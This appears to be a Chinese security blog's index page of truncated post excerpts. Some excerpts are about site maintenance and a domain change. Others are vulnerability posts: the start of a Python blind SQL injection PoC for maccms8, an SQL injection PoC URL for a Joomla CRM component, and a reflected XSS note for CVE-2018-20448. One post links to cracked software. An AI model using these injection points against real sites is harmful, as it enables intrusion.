前阵子wordpress升级到了5.0版本，有些功能也跟着改变了，所以我这个小博客也就开启了注册功能+邮件通知，但是不得不说，一天到晚的被恶意爬行数据+恶意注册真的很烦！   每天登陆博客第一件事就是删除那些垃圾、恶意注册的用户，...

这件事也是这几天才发生的，因为忙于春节前的一些准备就没怎么关注博客这边，期间也收到过腾讯云那边的监控警报，但是没怎么注意，以为是网络波动…… 直到2月2号登上服务器才特么发现硬盘直接被写满了，好吧查了下问题是数据库日志高达...

文章是转载一位表哥，全程分析这里 maccms8_mfb(苹果CMS视频分享程序 8.0 | 2017.09.27 发布的版本 Poc #! /usr/bin/python # -*- coding:utf-8 -*- #author:F0rmat import requests import time dict = "1234567890qwertyuiopa...

# POC: # http://localhost/[PATH]/index.php?option=com_joomcrm&view=contacts&format=raw&loc=deal&tmpl=component&deal_id=[SQL] # GET /[PATH]/index.php?optio...

# Version:0.9.5 # CVE :CVE-2018-20448 # The parameter under /install/index.php is that the Database name has reflective XSS # 1 The Database name , username and password must be correct # 2 You can use the exp: <sc...

unhonker.com这个域名已经使用了大概7年的时间，关于更换新域名（hedysx.com）的事情考虑了1个多月才决定也算是代表一个新的开始吧。 另外再说一下前几天的数据回档的事儿：https://www.hedysx.com/information/2181.html

软件转载自吾爱破解。 测试了一下，9.0.8版本是可以用，腾讯TIM暂时没测试。 百度网盘下载地址： https://pan.baidu.com/s/1hT2QTcbyIubK48eIOy6oyA 提取码：5f3c 解压密码：unhonker.com